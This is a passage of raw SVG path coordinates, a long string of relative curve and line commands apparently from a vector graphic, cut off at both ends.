c-1.9-.5,1.1-.5,3.7-.6-4.2-.5-4.8.3-7,0a13.65,13.65,0,0,1,5-.7c-.1-.8-5.1-2.5.1-3.1-5-.8-7.6-4.5,1.6-2.9.7-.7-2-1.7-2-2.2,1,.6.7-.2,5.7.1-1.5-.4-2.1-.4.9-.5-6.7-.2,1.7-.7-3.7-1.1.1.1-1,.1-1.4,0h8.3c3.9.4,1.1.4,3.5.8,4.8-.1,4.7.2,8.7.4-3.4-1.5-1.3-1.2.7-2.4-5.2-.2-1.3.5-5.2.4-.2-.2-.3-.4-.5-.6-2.6,0-4.7,0-5.5.1,5.2.1-.6.3,4.6.5-1.1.1-.7.4-5.4.2-.5-.2.9-.5-3.2-.5,1.3.3,2.5.6-.8.6-5.4-.7.6-2-5.4-3,4.6-.2,5.6-2.2-2-2.3,3.1-.2,2.2-.1,6.8-.2,1.8.4-2.1,1.1,3.9,1.3-1.4-.5-3.7-1.3,3.6-.7,0-.3-4.5-.4-4.7-.7,1.9,0,3.8.1,5.7.1.1.2.2,1.1,3.4.7-4.1-.3-.4-.7.6-.9-3-.3-4.9-1.5,2.9-1.5,1.6.1,2.3.2,3,.3-.1.4-3.7.8.9,1a58,58,0,0,1-7.1-.2c-.1.5,4.3.2,6,.5-2.8.1-5.6.2-.9.5,4.3-.2,7.2-2,1.7-2.8,5.5-.3-5.2-1.9,9.6-1.7-1.6-.3-1.3-.9,3.4-.9.7-.3-4.1-.3-3.3-.6,2.6-.6,8.2-.3,16.3-.4-7.9-.2-7.2-1-3.9-1.3a21.78,21.78,0,0,1,3,.3c4.5-.3-7.8-.8-.8-.9,4.4-.1,2.5.7,4.4.3-3.6-.5,4.1-.4-2.1-.8.7-.2,4.1-.1,5.4-.2-5.9-.4-6.3-2.4,3.9-1.9-6.5-2.2,6.1-4.8,5.3-6.6,2.7.1,6.1.2,6,.5-1.9,0-6.3,0-1,.4-.4-.2,1.2-.2,4-.1,2,.4-3.7.6.8.9.3-.3,1.7-1,1.7-1.3-1.5-.1-6.6-.2-8.8-.5,10.4.4.7-.4,5.1-.5,2.3.4,8.5.3,5.6,0,.1.3-4.7-.1-4.4-.2,1.2-.4,14.8-.2,9.1-.7-3.4-.1,1.2.5-4,.2-5.8-.3.3-.7.5-1-8.6-.4-11.4-1-9.7-1.5.7.5,2.7.3,7.3.4-.1-.7-2.1-1.2,2.7-1.7.5.2,0,1.1,2.1.8-2.1-.6,3.6-.5,6.8-.2-3.1-.6,2.5-.5-2.3-1,1.8,0,1.8-.1,4.2,0s3.4.3,3.2.5c5.9-.2,6.5-.3,10.6-.6-3.7-.2-4,.3-5.6,0,1.2-.4-3.4-.5-3.5-.8,6.7.2,3.8-.5,6.4-.6,6.4.6-4.8.8,2.5,1.3-.3-.3,1.6-.6,6.6-.4,1.1.3-1.1.8,2.19.9,2.2-.5-.69-1,8.9-.9-6.3-.3-.4-.9-5.4-1.4,2.7-.1,2.81.1,5.6,0-2.69-.4,4.8-.3.9-.5.1.3-4.69-.1-4.4-.2,3.6.1,2.5-.3,2.31-.6,4.4.2,4-.1,8.4.1-5.1-1.2,5.4-1.7,3.09-2.8,2,0,7.4.3,7,0-4.3-.3-5.8-.7-3.59-1a21.48,21.48,0,0,1,3,.3c2.91-.4-1.4-2.1,8.6-1.3-4.5-.5-8-1.6.2-1.3-1.3-.4-6.5-.2-7.3-.4,11.4-.8,2.1-2.3,8.8-3.2,6.2,1,4.4.1,5.3-.1-1.7-.3-2.3-.6-3.6-.9,0-.1-.4-.2-1.8-.4-.3-.1-.7-.1-1.1-.2.2,0,.4.1.6.1-.4,0-.7-.1-1.2-.1a31.52,31.52,0,0,1,4-.2l1.2.3a1.25,1.25,0,0,1-.6-.1c0,.3.1.6,2.4,1-.19-.2-.1-.2.1-.3a3.88,3.88,0,0,1,1.6,1,4.91,4.91,0,0,1-.5-.1c.2,0,.3.1.5.1a.79.79,0,0,1,.2.7h0c0,.1-.1.3-.1.4a5.54,5.54,0,0,0-1-.2c-3.2-.2.1.8-2.5.8a24.16,24.16,0,0,1,4.3.9c-3.1-.5-4-.2-1.8.4-2.1-.1-3.4-.7-5.2-.8,2.8.5,2.5,1.1,3.5,1.2,0-.1.2-.2,2,.1,2.1.5-.7.2.3.7,3.91.7,1.6-.2,3.91.1-.81.5,3.19.6,3.19.6,4.1,1-1.4.4-3.9,0,4.1.6,7.5,1.6,8.3,1.3-4.4-.9,1.7-.1-2.5-1.2a21.08,21.08,0,0,0,4.1.5c-2.2-.6-4.4-.5-5.4-1.1,1.4-.7,10.6,1.5,9.7,2.1,2.1.1,1.4,0,.7-.5,3.6,1,2.4.2,4,.3,1.3.4,1.1.6,1.3.9a5.08,5.08,0,0,1-.8.3,3.07,3.07,0,0,0-1-.2c.5.3.3.4,0,.5-.5.1-1.1.3-1.7.4,1.3.7,1.6,1.4,1.7,2-.2,0-.4-.1-.6-.1,1.5-.3-1.3,0-5.2-.9.3.2-.2.4,1.3.7.1-.7,2.5,1,4.2.8-2-.4-1.1-.4.4-.3a1.52,1.52,0,0,0,.1.6c-1.2,0-2.8-.1-3.1.2,1.5.3,2.6.5,3.3.7a3,3,0,0,0,.4.7h-1.09a10.53,10.53,0,0,0,1.4.3,5,5,0,0,0,1.1.7c-.7,0-2.91-.4-3.1-.3,4,.8-.1.4,3.4,1.1a19.63,19.63,0,0,0-2-.2,13.53,13.53,0,0,0-2.3-.7c-.91,0-1.1,0-.91.1-3.8.7,8.1,2.3-3.09,2.4a5.23,5.23,0,0,0-1.31-.1c-2.1-.4-1.69-.7-4.69-1.2a11.09,11.09,0,0,0,3.5,1.2c-.1-.2,1.8.2,2,.1a4,4,0,0,1-.5-.1c6.4.4,2,.5.5.9,3.9.2,6,.5,1.9.6,9.5.6,1.8-.5,3.19-1.1a9,9,0,0,0,3.1,0c.2.1.5.2.9.4.7-.1,4,1,5.5,1.4,1.1-.4-6.5-2.1-.69-1.6a12.16,12.16,0,0,0,4.3.9c-1.3-.4-2.8-.8-4.4-1.2-.9-.6,1.5-.4,2.69-.4-1.59-.3-3.8-.6-4.3-.8h.4c1.31.3,2.81.6,4.7,1,.8,1.5,4.6,3.6,1.8,5.2,10.7-.4-2.6-2.5,7-3.1,1.9.1,4.1.2,6.1.2.5.2.3.3,3.1.6-2.1-.1.4.5,1.3.9,1.5-.4,1.6-1,1.5-1.6a87.43,87.43,0,0,1,12.3-.9c-2.4-1.2,3.31-2.2,10.5-2.8-.8.3-1.8.5-.2,1-.09-.1.31-.2,1,.1.31.4-5.19-.7-5-.3,2.5.5,4.31.3,5.2.8-3.5-.3.1.2,1.3.7-2.19-.2-1.69.3-3.9-.1,7.5,2.1-1.3,1.5.2,2.5-3.9-.6-3.8-.2-4.9,0,3.9.7,1.7-.3,5,.3-1.4.8,3.8,3.1,7,4.6-2.8-.4-2.2-.6-4.3-.9-.6.3,4.1.9,4.5,1.3-4.3-.2-10.3-.5-3.3,1.2.1-.2-.6-.5.8-.3.1.3,5.7,2.1.8,1.7a39.85,39.85,0,0,1-4.4-1.1c1.4.2,1.8.1,1.9-.1-3.3-.5-2.9-.8-5.4-1.2-1.3.2,3,.7,2.4,1-2.9-.5-2.2-.6-4.2-.7,2.4.6,3.1,1.4,5.6,1.6-4.5-.5,2.4,1.6-2.4,1.2-2.7-.5,2.5-.2-2.4-.9-.6.1-.4.5.5,1,4.6.9-1-.4,2,.1,4.6.7,3.8,1.7,6.7,1.9-4.4-1.4.2-1.5-4-2.3,2.8.2,3.2-.2,6.9.3,0,.4.5.4,1.6,1.3-3.1-.4-10.1-.8-1.6.6-1-.6.7-.4,2.9-.1-2.3,0,3.5,1.1.4,1,4.6.7.8-.8-.6-1.2,1.3.2,1.5.4,3.2.6-2.5-1.8.9-2.1,4.6-2.7-5.4-.9-3.1.2-8-.6a8,8,0,0,0-1.2-.4c3.3.5,3.4.2,2.8-.3,3.6.6,4.4.5,6.1.7-7.1-1.7-3-2-1.1-2.3a20.39,20.39,0,0,1,2.2.6c1.2-.5.7-1-2.7-1.7,2.2.4-2.7-1.1.6-.7.7.2,3.4,1,4.2.8-3.2-.7-3.4-1.3-3.8-1.8a25,25,0,0,0,5.1.5c-1.8-.6-4.8-.6-6.4-1.2,4.1.4.3-.9,5.6-.4q-4.05-.6-3.3-.9c1.2.2,7,1.4,4.2.7-3.8-.5-3-1.3-.4-.8-.3.8,6.2,1.4,7.9,2.4a16.72,16.72,0,0,0-2-.2c-2.1-.3-1.5-.6-4.3-.9-.3.5-2.9,0,.4,1a25.83,25.83,0,0,1-5.1-.6c-.2.4,5.2,1.1,5.5,1.5s-1.6.1-.7.5c-1.1-.2-2.1-.4-3.1-.5,2.3,1-.2.2,3.5,1.4-1.2.2-4.2-.2-7.1-.6.8.4,5.8.9,6.4,1.3,0,.6,2.2,1.3-.4,1.3-1.7-.3-.7-.4-2.3-.7.1.2.2.3.2.5,3.4.6,3.1.3,5.3.9-3.4-1.8,2.9-1.7-1.6-3.5a45.32,45.32,0,0,1,5.2.8c-1-.7-1.8-1.3-3.3-.9a20.16,20.16,0,0,0-2.3-.8c4.6.8,5,.2,1.8-.3,3.7.6-2.4-.8.9-.2,3.3.4,2.8,1,4.6,1.7,2.9.1-1-1.3-1.9-2,4.7,1.2-.3-.9,2.7-.4,1.8.3,2.5,1.1,4.4,1.1-3.4-1-1.8-1.3-7-2.5,6.9.5-7.2-3.1,1.7-2.5-3.3-.7-1.8-1-.5-1.1,2.4.4-.2.6,4.4,1.2-.5-.5-2.1-1-4.6-1.5.2-.2,2.7.2,2.9,0-1.9-.3-3.9-1.2-2.4-1,1.2.2,1.2.4,1.2.5a10.4,10.4,0,0,0,4,.3c-1.6-.3-3.9-.6-4.3-.8a47.94,47.94,0,0,0,9.8.2c-5.3-.9,1.7-.4-4.5-1.3-.1.4,3.1,1.5-.8.4-2.4-.1,1.8,1-.6.8a15.24,15.24,0,0,1-2.1-.4c-.8-.7,5.2-.1,1.3-1.3-.1.1.3.4-.9.2a8,8,0,0,0-1.2-.4c.3-.2,4,.6,2.9,0-5.6-.6.1-1.1-7.9-2.4,3.8.4-.8-.3-.3-.7a19.35,19.35,0,0,0,2,.2c1.9.3,3.8,1.2,5.4,1.1-2.6-.5.1-.7-3.5-1.2.9.3-1.8.2-2-.1-1.3-.6,6.1.5,1.7-.6a5.55,5.55,0,0,1-2.1-.2c3.1,0,.8-.8,1.4-1.2a16.44,16.44,0,0,0,4.6,1.7c-1-.7.2-.7,2.7-.4-3.7-.7-5.3-.6-6.3-1.2,3.1.5.9-.5,3.9,0-3.6-.4-5.6-1.3-6.4-1.2,3.8,1-2.6-.4-2-.1,1.7.2,2,.9.3.6.3-.2-2.5-1.2-3.4-1.1,2.6.4.4.4-.9.2a4.69,4.69,0,0,1-.6-.2l1.2-.6a13.09,13.09,0,0,0,3.9.1c-1.6-.3-2.6-.4-3.4-.5.3-.2.5-.4.4-.7a11.17,11.17,0,0,0,2.7.8c-1.4-.8-2.1-1.9,1.1-1.7,1.4.9.6.9-1.4,1.1,5.7.9,6.9,1.3,12.8,2.5.6-.3-3.3-1.3-3.5-1.2-1.2.1,4.3,1.1,1.3.7-3-.6-4.9-1-5.5-1.5,3.4.3.5-.4,1.7-.6,4.2.9,2,0,4,.3,2.1.6.2.3.3.6,6.5,1-.1-.5-.4-.8,1.8.3,3.3.6,4.2.8a5.7,5.7,0,0,0-2.3-.8c-1.2.3-9.2-1.6-7.7-1.9a26.05,26.05,0,0,1,5.2.8c.1-.2-1.3-.5-1.3-.7,3.8.7,2.6,0,6.1.6-1.4-.7-.2-.6-3.5-1.2-3-.4-.1.4-1.9.1-1.6-.3-4-1.2-1.4-.9,3.4.6,5.6,1.2,6.2.8-5.4-.6-.8-.3-3.3-.9a41.57,41.57,0,0,1-7.2-.9c-.7-.8,1.5-.6,1.5-1,1.3.5,1.1.9,3.6,1.5,3.7.1-2.3-1.7,2.3-1.3-2.6.1,2.7.9,4.6,1.5,1.3-.1,3.3.7,4.1.6a16.33,16.33,0,0,1-4.4-1.1c3.3.5,4.5.1,7.1.7-1.6-.8-6.3-2.3.2-1.8,1.1.4-3-.1.2.5,0-.1.8,0,1.1.2.5.4-4.8-.9-3-.2,5.3,1,4.4,1.7,7,2.6-2.9-.6-1.9-.1-3-.2a11.42,11.42,0,0,1,3.1.8,3.7,3.7,0,0,0,1.1.1,5.44,5.44,0,0,1-1.1-.3c-.4-.1-.3-.1,0-.1.7,0,2.4.2,1.9,0a6.07,6.07,0,0,1-1.9-.5c-.3-.1-.2-.2,0-.3s1-.3,0-.7a4.76,4.76,0,0,0-.9-.3,3,3,0,0,1,.9.2,18.66,18.66,0,0,1,3.4.7c-.3,0-2.4,0,.2.5.2-.2,1.5-.2.7-.7-1.9-.3-2.5-.5-2.3-.7-.8-.1-1.4-.2-2-.3a14.26,14.26,0,0,1-3.4-.8c1.6.2,2.6.5,3.4.6s1.4.3,1.8.1c-.6-.1-1.2-.3-1.8-.4-3.5-.8-6.3-1.5-9.1-2.2,3.4.7,2.5.2,4.1.5a2.76,2.76,0,0,0,1.2.4c-1.3-.7,2.9.6,3.9.5h0c-6.8-1.3-1.7-.7-6.5-1.9,3.4.7,2.2.5,4.2.6.4.6.3.2,2.4.5.3,0,.5.1.8.1A8.44,8.44,0,0,0,880,5a16.62,16.62,0,0,0-2-.3q-.45,0,0,.3a5,5,0,0,0,1.2.3c.3-.2,5.5.8,6.3,1a20.88,20.88,0,0,0-5.8-2c.7-.4,1.3-.8,5.9.2.3.3-2.2-.1-2.9,0,2.8.9,3.8,1.6,5.9,2.2-1.8-.6,4.4.4,4.1.6-1.3.1-4.4.1-.7.7-5.8-.8-3.1.4-7.9-.3-.3.3,2.8.9,4.5,1.3-2.7-.4-1.5.2-2.9.1a19.45,19.45,0,0,0-5.1-.6c3.2.6-1.6.5,1.3.7a6.05,6.05,0,0,1,1.9,0c-.3.3,1.7.7,2.4,1.1,3.6.6,1.4-.3,6.1.7a2.68,2.68,0,0,1-1.8.3c-.7-.4-1.9,0-4.1-.5,1.6.7.2.6.6,1.2,5.6.9.4-.4,1.6-.7,8,1.3,6.8.2,13.1,1.1-1.2-.6-4.9-1.1-1.4-.9l-5.2-.9c-.3.3,3.3.8,2.4,1.1a8.82,8.82,0,0,1-2.9,0c-.5-.4-1.7-.7-2.6-1.3,3.7.7.9-.4,3.9.1-7.5-1.1-3.6.3-9.8-.3,1.4-.3,2.1-1,9.5-.3-.4-.3-1.7-.2-2.2-.5,1.1.2,1.2,0-.1-.2.6.3-2.5.1-3-.2,1.4-.1,1.4-.5,3.8-.3,2.2.4,1.2.6,3.4,1,.5-.1,1.4,0,1.9-.1-2.1-.4-6.9-1.5-3.4-1.1,1.9,1,1.7-.8,7,.5-.6-.4-3.5-.9-2.5-1.2,4.5,1,1.8.1,4,.3,2.2,1.6,4.5,3.7-2.5,2.9,1.2.9.6,1.1,1.8,1.7,1.4.2,2.3.4,3.2.6-.3-.4,4.5.5,5,.3-3.1-.4-5.1-.7-6.3-1,.7-.2-3.5-1.2-.4-.8,1.3.3,1.4.6,1.4.9,3.9.5,8.6.7,5.7-.3,0,.3.1.6-2.9.1.7-1.2-3.9-3.6,4.7-2.5.9.1,1.8.2,3,.4-4.1-.9,5.8.5.7-.7-1.1-.1-.1.4-3-.2a.74.74,0,0,0-.7-.3,9.16,9.16,0,0,1-2.5-.2c-.1-.2-.2-.5-.3-.7-4.5-.8-3.2,0-7.1-.6,3-.3,15.4.5,4.1-1.5a.26.26,0,0,0-.1-.2c2.5.3,4.5,1.1,5.2.9-1.6-.4-3.4-.7-3.4-1,4.7.8-1.1-.7,1.7-.5l2.4.7c2.5.9,2.4,1.6,1.9,2.1a9.18,9.18,0,0,1,2.2.6c4.2.9,5.2.4,7.3,1.1-2-.1-2-.2.2.4-2.9-.4-3.9-.2-3.7.3,5.7,1-.1-.4,2.9-.1,5.7,2.1-1,1.4,1.4,2.9,4.8,1,2.7,1.1,7.6,1.8-4-.5-6.4-.6-8.4-1.4-.8.2,3.2,1.3,4.5,1.3-.9-.3,2.8.7,3,.2a14.34,14.34,0,0,1,3.5,1.2c-1.9-.1-1.9-.4-5.2-.9-.4.4-.4.3.4.8,1.4.5,3.8.4,5.3,1a25.66,25.66,0,0,0-4.8,0c6.8,1.7,2.8,1.9,3.2,2.8-2.5-.5-7.1-1-4-.3,1.4.1,3.5.3,6.1.7-1.6.1-3.3-.1-.6.8-5.5-.9.3.6-3.8.1,1.6.3,5.4.8,5.3,1a.35.35,0,0,0,.1.2c-3.8-.6-5.1-1.1-8.5-1.6-1.3.2,4.7.8,3.4,1,3,.6,2.6.3,5.2.8-.8.4,3.2,1.6-1.3,1.3,4.1.8,2.2.8,3.5,1.2-.7.1-5.1-.9-4-.3,2,.3,2.4.5,4.2.8.1-.1.2-.2,2,.1,7.5,1.6,2.5,1.8,2.1,2.3-.1.1,5.3,2-1.8.4,1.2.5,2,1.1-2.8.2.5-.1,2.4.1,1.8-.4-3.1-.5-3.7-.9-6.5-1.4,1,.7-3-.7-1.9,0,.5.4,5.2.6,6.4,1.2a8.82,8.82,0,0,1-2.9,0c-.3-.2-2.4-.5-3.3-.8-.5.1-2.5.4-.6.8,1.8.2-.3-.6,1.8-.3s8.7,1.7,2.2.5c-.1.4,6.1,1.1,4.5,1.4a17.2,17.2,0,0,0-3.2-.5c.1.4,2.7.4,4.4,1.1a26.83,26.83,0,0,1-4-.3c3.2.9-1.8,1,4.6,1.5a2.68,2.68,0,0,1-1.8.3.17.17,0,0,1-.23.07.18.18,0,0,1-.07-.23l0,0a.16.16,0,0,1,.23,0h-.6c-.8-.2-1.6-.2-3.6-.6.2.2.3.3.3.4h-.3c-.9.2-.7.3,0,.4a6.32,6.32,0,0,1-1.3.4c2.5.6,3.8.3,4.2.7-2.7-.4,1.5.4.2.5-1.5-.2-3.9-.7-4.1-.6.3.5,2.4,1.4-1.5.9-.6-.3.9-.4-1.3-.8-2.9,0,3,1.3.6,1.2,1.4.2,2.8.5,4.2.7-.1.4,4.1,1.5-2.7.4,2.1-.1-3.8-1.5-7.7-1.9,0,.3.9.9-.6.8,1.5.5,3.1.3,4.2.8-1.6.1,4.4,2.1,2,2.2,2.1.2.6-.5,3.9.1,3.8,1.4-2.7,1.2-1,2.1a12.25,12.25,0,0,1,2.9-.1c1.6.8-1.6.7-1.2,1.6.1.2,1.9.4,2.2.6-.1.5-5.3.2-8.8-.2,7,1.3,6.3.5,9.1.7,2.7,1-2.8.3.6,1.3,1.6.2-.5-.6,2.9,0-2.1-1.3-5-2.8.8-2.4-1.8.4.8.4,3.5,1.2-.2.3-4,.2-2.7.6a5.85,5.85,0,0,1,2,.2c2.5.8-2.3.6.5,1-.2-.2.7-.2,1.9,0,2.7,1.4-1.9,1.2,3.2,2.6-7-1.1,1.5,1.9-5.4.9-.6-1.2.4-1.6-1.2-2.6-2.6-.2-2-.7-3.4-1.1-4.9-.2,1.3,1.7,3.1,2.5-1.3-.2-1.4-.1-3.1-.4.5-.3-2-.8-1.5-1.1-1.8-.2-5.6-.9-5.1-.5,2,.4,2.3.2,4.1.6a7.72,7.72,0,0,1,.4,1c-7-1-6.7-1.2-13.7-2.4,0-.1,1.3.1.9-.2a59.9,59.9,0,0,1-12-3c-2.9-.1,4.1,1.1,2.6,1.4a17,17,0,0,0-3.1-.5c3.3.5.7.7,4.4,1.2q-.45-.45,1.8-.3c.1.2,1.9.4,2.2.6,1.1.5-1.5.1-1.8.3a10.32,10.32,0,0,1,2.2.5c4.2.8-1.3-.6,4,.3,6.7,1.6,14.6,2.5,12.1,3.1-5.3-.6-2.6.3-1.4,1.1-1.4-.2-2.3-.4-3.2-.6-.3.2-2.8.7,1.7,1.5,2.3.4-1.5-.5-.3-.6,3.4.7,1.2-.2,4,.3,1.6,1.2-.5,1-5.7.3.4,1.1-2.3,1.2-2.7,2.6,2.5.6,3.8.3,4.2.7-1.7.1.8.6.5,1.1-1.6-.4-2.6-.6-3.1-.4,3.7,1-3.4,0,2.4,1.1-.3.2-3.2-.2-5-.4,1.4.4,3.9.8,5.4,1.1.5.3,0,.4-.8.4,1.4.4,3.9.8,5.4,1.1-1.1-.6,2-.1,3.9.1.5-.2-1.1-.5-1.4-.7.1,0,.2-.1.3-.1,1.3.2,2.6.4,4,.7.7.5-2.3.1,1.3.8,3.9.2-7.4-2-2.9-2-.5.5,2.8.6,4.4,1.1-.9-.8,9.8-.5,10.1.9,3.6.7,3.7.4,4,.2q-4.05-.6-3.3-.9c-1.9-.4-6.1-.9-6.4-1.2.7-.2,1.7-.4-1.5-1.1,4.7-1,1.1-3.8,2.2-5.6,1,.6,1,.6.4,1,6.1,1,2.7,1,3.5,1.2.9-.2,1.2.5,3.1.5,1,1-.8,1.4,4.2,2.8-.3-.9,6.7,1.5,6.2.8-6.4-1.5-5.3-2.1-1.9-2.1-1.2-.2-3-.5-3.2-.6,3.6.3,3.8,1.1,5.6,1.6A27,27,0,0,0,979,53c1.6.4,3.4.7,3.4,1-.8.3-2.1-.1-.7.7-1.4-.2-2.3-.4-3.2-.6-.1.3,2.5.8,2.4,1.1l-5.3-.9a31.71,31.71,0,0,1,8,2.7c1.6-.4,10.3.2,6.3-1.1,1.8.3,6.3.7,7.3,1.1-2.3.1-3.4-.1-.5.9-1.3-.2-1.5-.4-3.2-.6.4,1-7.2-.8-6.7.2a51.94,51.94,0,0,1,5.5,1.5c.5-.2,4.9.8,5.3,1-2.1-.1-2.7,0,1.2.4-2.3,0-.3,1.3-4.5.8-2.5-.4-3.2-.7-6.4-1.2-3.1-1.1-1.5-1.9-2.2-2.7a37.31,37.31,0,0,0-4.1-.5q3.45.6,3.3.9a52.82,52.82,0,0,1-5.3-.9c.3.3.5.6-1.8.3-.1-.2-.1-.3-.2-.5-5.2-.9-7.1-.4-5.7.2a12,12,0,0,1,3,.2c.3.2,1.8.5,2.3.7-.6.3-3.6-.5-5.1-.5,3,.7-2.3-.3-2-.1,1.6.4,3.4.7,3.4,1-1.6-.2-3.9-.7-4.1-.6,8.6,2.5-5.1.9,2.6,3.4a12.75,12.75,0,0,0-3.9-.1c3.9.6,5.7.7,9.3,1.2-.5-.6-1.4-1.8,3.3-1.2.3.3,2.6,1.1-.6.8,1.6.3,3.9.6,4.3.8-1.8.9,3.4,3.4-.1,3.9.2-.2,4.6.7,5.1.6-4.3-1.1-3.3-1.5.4-1.3-3.7-1.3-2.3-2.3-3.4-3.2,5.8.9,6.7.1,11.1,1,.5-.2-1.8-1.2.5-.9.4.4,3.5.9,4.5,1.3.8-.1,2.2-.1,1.6-.6,2.6.5,3.4.8,4.1.6-.7-1-2.6-2.4,3.8-2.3,6.1,1.2,2.8,1.4,4.9,2.1,1.9-.1,0,.5,2.3.8.1-.3,6.4.8,7.3,1.2-.8.1-2.4,0-6.1-.7.3.3.5.7,3.4,1.1-2.2-1,5.5.8,5.1.5a19,19,0,0,1-3.3-.9c6.1,1,.3-.5-1.5-1,3,.2-4.4-2.3,2.1-1.8,1.4.6,2.5,1,1.5,1.1,4.3.8,6.6,1.5,7.8,2.2-2-.1-2.1-.4-4.3-.8.6.4,6.7,1.9,1.5,1.3a9.61,9.61,0,0,0-3.4-1c3.3,1.2,9.9,2.8,10.3,3.5,1.8.3,3.2.5,4.1.6,2.1,1.4,8.2,3.5,2.3,2.9.9.5-.8.9,1.7,1.5.7-.3,5.8.6,4.9.1a66,66,0,0,0,6.7,2c-2.3-.3-1.5.2-1.8.5-.1.1-.3.1-.9.1a2.7,2.7,0,0,0-.8-.1c-1.2-.3.9-.4-1.5-.7-1.7,0-2.6.2-3,.6-1.1.9,1.1,2.6-3.2,2.7-3.2-.8,2.5-.5-2.7-1.6-2.3,0-.8.9-3.4,1-3.9-.6-4.7-1-4.5-1.3,6.2,1,2.3-1.1,10,.7-2.6-1-3.5-1.7.3-1.5-.1,0-.2-.1-.4-.1-1.1-.3-3.7-.7-3-.9a15.44,15.44,0,0,1,3.3.8c-4.8-1.4-1.7-2.9-7-4.6a37.91,37.91,0,0,0,4.1.5c-2.5-.5-3-.9-5.5-1.4,1.3.6-2,0-2.9.1,1.5.3,3.9,1.2,1.4.9s-1.3-.5-3.3-.9c-.2.1.1.2-.9.1a2.67,2.67,0,0,0-1.2-.4c-.1.5,6.8,2.3,1.8,1.7.9-.3-3.6-.8-4.4-1.2,2.2-.1-1.8-1.6-2.9-2,1.4.9-5.6-.4-6.9-.1-1.7-.7,2.8.2,1.8-.3a49.24,49.24,0,0,0-10.2-1.1c.6-.2-2.3-.6-3.3-.9-1.5,0,.3,1-5-.3-.2.3,1.6,1.1-1.7.6-2.3-.6-.1-.9-4.6-1.7,13.3,4.2-14.6.3-5,3.7-5-1-4.5-.5-6.1-.6-3.9-.8-6.9-1.6-9.8-2.4,1.9.1,0-.3-.3-.6,1.7,0,4.1.7,4,.3-1.8-.3-3.2-.5-4.1-.6-.8-.6.6-.6,1.4-1.2-3.6-.8-3.7-1.1-7.5-1.6,1.8,1.1-2.2.7,3,2.3-2.3-.7-10.8-1.5-5-.3.1-.2-.6-.5.8-.3,1.6.3,3.8.6,4.2.8-.8.3,3.6,1.4-1.7.5,1.3.1,1.2-.2-1.3-.7.1.4-1.9-.3-3-.2,2.9.8,3.6,1.8.7,1.6-1.1-.2-2.1-.3-3.1-.5,2-.2-7.3-2-2.4-.9-2.4.4,6.9,2.3,10.1,3,.6.4-3.9-.5-4-.3,4.8.8,5.1,1.5,7.8,2.2-.5-.3,3.7.2,4.1.6-1.8.4,1,2.2-2.9,2.1-1.9-.4-3.4-.9-4.2-.7,7.2,1.2-1.6.7,1.7,1.5,3.6.7,1.1-.3,5.1.5-.5.3,1.6.7,3.4,1.1a13.75,13.75,0,0,1,2.2.6c-3.6-.1-2.1,1.5.1,2.4,3.5.4-1.5-.9,2.8-.3,2.2.5,6.6,1.2,8.6,1.8-1.2,0,.8.9,2.6,1.4a6,6,0,0,1,4.1.6c1.6-.7-2.4-1.9-1.2-2.7a39.56,39.56,0,0,1-4.3-.9c1.8.2-.3-.6,1.8-.3,3.7.6,1.6.9,5.6,1.6.7-.2-4-2,1.5-1l-.3-.6c-7.3-1.2-4.1-2.1,1.6-.7.8-.4-1.4-1.6,4.6-.6-2,.3-1.3,1,2,2.1.3-.2,2.9.3,1.8-.3-2.8-.4-2.1-.6-3.3-.9,2.4.4.8-.4,2.9-.1,3.4.7,3.2.3,5.1.6,3.3,1.1-.7,1-1.3,1.3,4.1.7.6-.5,3.9,0,1.7.3.7.4,2.3.7,2.3.3-.9-.9,1.6-.6,1.5.5,1.1.9,4.6,1.5a32.09,32.09,0,0,1-4.7.2c3.7.4,4.6,1.3,10.8,2.5-4.2-1.2-9.4-2.9-1.9-2.1-1.6-.8-2.3-1.8,1.2-1.6a38,38,0,0,0,5.6,1.6c4.4.5-3.5-1.4-.6-1.3.2.2.4.3,2.2.6.1-.3-2.2-.7-3.4-1.1a31.24,31.24,0,0,1,7.2,1c-3.5.8.5,2.7-5.3,3.1-2.3-1.3,5.4-.9-2.2-2.6,3,1-2.9.2,1.6,1.3-1.6.2-6.2-.5-3.7.4-1.1-.6,2.7.3,3.1.5-1,.2-1.1.1-1.7.5,5.6,1,3,1.6,9,2.6-6.5-2.2.5-2.1,4.7-2.3-1.7-.6-4.2-.5-5.3-1a12,12,0,0,1,3,.2c5.3,1.2,3.9.6,9.3,1.2,2,1-4.8-.4-4.9,0,.7.4,5.4,1.6,3.6,1.5a21,21,0,0,1-2.2-.6c-.5.1-1.4,0-1.9.1a24.16,24.16,0,0,1,4.3.9c-5.2-.8-8.7-1.1-9-.6,1.8.3,2.6.3,3.2.5-2.2,0-1.9.7-4.6.6,3.5.8.1.5,2.6,1.3-4.8-.8.8,1.1-3.7.4.8.2,1.3.3,1.2.4,10.3,1.9,2.8-1,8.5-.4-.4.6,2.4.8,3.2.6,5.6,1.8-7.7.5-1.2,1.7-.2.2-5.5.1-2.7.4,1.5-.3.8,0,5.2.8,2.2.3-2.6-1.1.6-.8,1.5.3,1.1,1,2.3.8-.9-.6-.1-.5-2.5-1.2,1.1,0,3.9.5,5.1.5-.9-.3-5.1-.8-4.4-1.1,11.2,1.7,4.3-.9,9.4-.7,3.9,2.2,1,3.2,2.1,4.5a6.26,6.26,0,0,1,2.1.4c.1.1.1.2.2.4-2.4-.4-4-.7-5.2-.8,2.6.9-2.2.1-2.7.4,2.9,1.3,1.2,3.2-1.3,3.5-.3.5,2.1,2.8-4.8,2.2,1.6.3,3.9.6,4.3.8a23.15,23.15,0,0,0-4.1,1.5c1.4.3,4,.6,4.2.8-.9.1-3.8-.4-5-.4,6.8,1.7-3.7.7,1,2.2,5.1.7,1.4-.3-.2-.5a2.7,2.7,0,0,1,1.8-.3c.1.5,1.6.3,3.1.5,1.3.4,1.3.5.2.5,8.3,1.4.4-1.1.2-1.6s7.8,1,6.9.3a15,15,0,0,0-3-.3c-1.6-.8-3.9-1.8.3-1.4.9.5,4.4.8,4.1.5-2.6-.6-1.2-.6-3.6-1.4,5.1,1.1.6-.6,6.2.8-.3-.6-3.1-.7-4.5-1.3,4.2.4-.8-.1-1.3-.7a20.19,20.19,0,0,1,4.1.6c.5-.5-2.8-1.5-.7-1.6-1.5-.4-3.3-.7-4.4-1.1,1.1-.3,2.3-.5,1.3-1.3,8,1.4,6.8-.5,12.6,0-1.07-.15-2.14-.35-3.2-.6.2-.3,6.1.8,2.9-.1-3.6-.7-1.1.3-5.1-.5-1.3-.8-4.5-2.4-2.2-2.6-1.1.2,4,1.3,4.4,1.2-1.7-.6-4.4-1.2-4.6-1.7,1.4.3,3.9.8,5.4,1.1,1.1-.4-1.9-1.6-.8-1.8a9.18,9.18,0,0,1,2.2.6c1.3,1-3.